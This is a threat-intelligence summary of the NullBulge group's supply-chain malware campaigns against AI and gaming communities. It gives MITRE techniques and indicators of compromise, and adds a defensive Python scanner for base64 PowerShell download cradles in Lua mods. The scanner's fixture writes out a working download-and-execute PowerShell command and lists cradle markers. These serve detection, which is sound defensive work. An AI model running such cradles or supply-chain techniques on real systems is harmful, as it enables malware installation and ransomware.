NullBulge | Threat Actor Masquerades as Hacktivist Group Rebelling Against AI

NullBulge is a new cybercriminal group focusing on AI- and gaming-focused ecosystems, leveraging software supply-chain attacks and public repositories to spread malware and ransomware. It uses Async RAT, Xworm, and customized LockBit payloads, while portraying hacktivist motives to disguise financial aims. #NullBulge #AppleBotzz #ComfyUI_LLMVISION #BeamNG #DiscordWebhook #GitHub #HuggingFace #DisneyLeaks #LockBitBlack #AsyncRAT #Xworm

Keypoints

  • NullBulge targets AI-centric applications and gaming communities with malware through public code repositories and mod distributions.
  • The group poisons the software supply chain by injecting malicious code into legitimate distributions on GitHub, Hugging Face, and Reddit.
  • Malware campaigns include trojanized Python libraries and Lua-based BeamNG mods that deliver Async RAT/Xworm before deploying LockBit payloads.
  • The AppleBotzz identity is used to host code and posts across multiple platforms; whether AppleBotzz and NullBulge are the same actor remains an open question.
  • Disney leaks (Slack data, DuckTales assets) and other high‑profile targets illustrate the group’s expansive data-leak strategy.
  • Exfiltration is conducted via Discord webhook, and the campaign emphasizes data collection and encryption payloads with configurable options.

MITRE Techniques

  • [T1195] Supply Chain Compromise – “poisoning the well”: the group targets the software supply chain by injecting malicious code into legitimate software distribution mechanisms, exploiting trusted platforms like GitHub, Reddit and Hugging Face to maximize their reach.
  • [T1105] Ingress Tool Transfer – “These campaigns resulted in malicious Python scripts which harvest and transmit data via Discord webhook.”
  • [T1059.001] PowerShell – “The Lua files contain base64-encoded PowerShell that, when decoded, downloads and executes the Async RAT sample (via Invoke-WebRequest).”
  • [T1027] Obfuscated/Compressed Files and Information – “The obfuscated PowerShell was injected into the mod files that subsequently downloaded Async RAT or Xworm, which in turn led to the deployment of their customized LockBit payloads.”
  • [T1567.002] Exfiltration to Web Service – “harvest and transmit data via Discord webhook.”
  • [T1070.004] File Deletion – “delete_eventlogs”: true (ransomware/cleanup behavior via configuration).
  • [T1562.001] Impair Defenses: Disable/Modify System Tools – “kill_defender”: true.
  • [T1021.002] Lateral Movement: SMB/Windows Admin Shares – “gpo_netspread”: true, “psexec_netspread”: false (lateral spread via Group Policy Object (GPO) tooling rather than PsExec).
  • [T1486] Data Encrypted for Impact – “NullBulge payloads are built using the LockBit 3.0 (aka LockBit Black) builder” (encryption-focused payloads).
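As an added defensive example (not code from the SentinelOne report or from the actor), the following Python scanner implements the check a mod reviewer would want for the Lua technique quoted under T1059.001 and T1027: it finds long base64 runs in a Lua file, decodes each as plain text and as UTF-16LE (the encoding PowerShell's -EncodedCommand expects), and flags any that decode to a download/execute cradle such as an Invoke-WebRequest followed by a process launch. The sample mod file, the placeholder URL, the minimum run length and the marker list are constructed assumptions, not indicators from the report.

```python
"""Flag base64-encoded PowerShell download cradles hidden in Lua mod files."""
import base64
import binascii
import re
import sys
from pathlib import Path

# A run of base64 characters at least this long (assumed threshold): short tokens
# (ids, hashes) are ordinary in code; a command that downloads and runs a file is longer.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{48,}={0,2}")

# Case-insensitive markers of a PowerShell download/execute cradle (assumed list).
CRADLE_MARKERS = (
    "invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
    "invoke-expression", "iex ", "start-process", "-encodedcommand", "powershell",
)


def decode_candidate(token: str):
    """Return the text a base64 run decodes to, or None if it is not text.

    UTF-8 is tried first, UTF-16LE second because that is what
    powershell.exe -EncodedCommand expects. Binary blobs (icons, models)
    fail both checks and are ignored.
    """
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    for encoding in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            return text
    return None


def scan_text(text: str, source: str = "<memory>") -> list:
    """Scan one file's contents; return one finding per suspicious base64 run."""
    findings = []
    for match in B64_RUN.finditer(text):
        decoded = decode_candidate(match.group(0))
        if decoded is None:
            continue
        lowered = decoded.lower()
        markers = [m for m in CRADLE_MARKERS if m in lowered]
        if markers:
            findings.append({
                "source": source,
                "offset": match.start(),
                "markers": markers,
                "decoded": decoded[:120],
            })
    return findings


def scan_paths(paths) -> list:
    """Scan the given .lua files, or every *.lua file under the given directories."""
    findings = []
    for p in map(Path, paths):
        files = [p] if p.is_file() else p.rglob("*.lua")
        for f in files:
            findings.extend(scan_text(f.read_text(errors="replace"), str(f)))
    return findings


# Constructed fixture (not from the report): a version-check mod that hides two
# copies of one cradle, plain and UTF-16LE, beside a harmless binary blob.
# The URL is a placeholder, not an indicator from the report.
_CRADLE = ("Invoke-WebRequest -Uri 'https://placeholder.invalid/update.exe' "
           "-OutFile $env:TEMP\\update.exe; Start-Process $env:TEMP\\update.exe")
_PLAIN_B64 = base64.b64encode(_CRADLE.encode("utf-8")).decode()
_UTF16_B64 = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()
_BLOB_B64 = base64.b64encode(bytes(range(256))).decode()
SAMPLE_LUA = f"""
local M = {{}}
M.version = "1.4.2"
M.check = "{_PLAIN_B64}"
M.fallback = "{_UTF16_B64}"
M.icon = "{_BLOB_B64}"
return M
"""

if __name__ == "__main__":
    # With no arguments, scan the constructed fixture; otherwise the given paths.
    results = scan_paths(sys.argv[1:]) if len(sys.argv) > 1 else scan_text(SAMPLE_LUA, "sample.lua")
    for r in results:
        print(f"{r['source']} @{r['offset']}: {', '.join(r['markers'])} -> {r['decoded'][:60]!r}")
```

Run it against a mod directory (`python scan_lua.py path/to/mods`) and review each finding's decoded preview; the UTF-16LE pass matters because a string that looks like random base64 under a plain decode can be a readable -EncodedCommand payload, which is exactly how a base64 blob inside a "version check" file escapes a casual read.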

Indicators of Compromise

  • [SHA1] Async RAT (via Pixeldrain) – f37da01783982b7b305996a23f8951693eb78f72, and 2 more hashes
  • [SHA1] Async RAT (via Pastebin) – 0cd5dc12bca41f6667547aa10b9cf1d989ba30a0
  • [SHA1] Xworm (via Pastebin) – 843d0df759ffd79b00f0adef3371e003a3539977
  • [SHA1] anthopic-0.21.3-py3-none-any.whl – c6a884dcf21c44de3e83427a28428c24582a8b6f
  • [SHA1] openai-1.16.2-py3-none-any.whl – 5a18ba89c118a7c31f3e8f674727da08779421ce
  • [SHA1] LockBit 3.0 – 89d9b7c3eff0a15dc9dbbfe2163de7d5e9479f58
  • [SHA1] admin.py – 93460d0789dce9cf65a90e542424b0ac057e1dc5
  • [SHA1] Fadmino.py – dcb47900458692589a594a293c1c7c2559cc4cbe
  • [SHA1] cadmino.py – 9eb83ab3f53e99cdc9948a6123c7c90fad9e3991
  • [SHA1] VersionCheck.lua – 2d1dca9c10996143b698a9351d1eb446c19f92a7
  • [SHA1] Build/config notes – 3f6c619bdc7d931a9a9f82dfc77963a02ab9c2bf
  • [Domain] group.goocasino.org, nullbulge.com, nullbulge.se, nullbulge.co, nullblgtk7dwzpfklgktzll27ovvnj7pvqkoprmhubnnb32qcbmcpgid.onion
  • [IP] 86.107.168.9
  • [Monero] 45i7kjWZuzJ4PdSbandaaE8S6mQATmneTYEpgsaaCqDmc7foEJDXwxd3ABR8bn6YE4c7hZ2dYEEr1CwG48gAknPL6zUpYyV

Read more: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/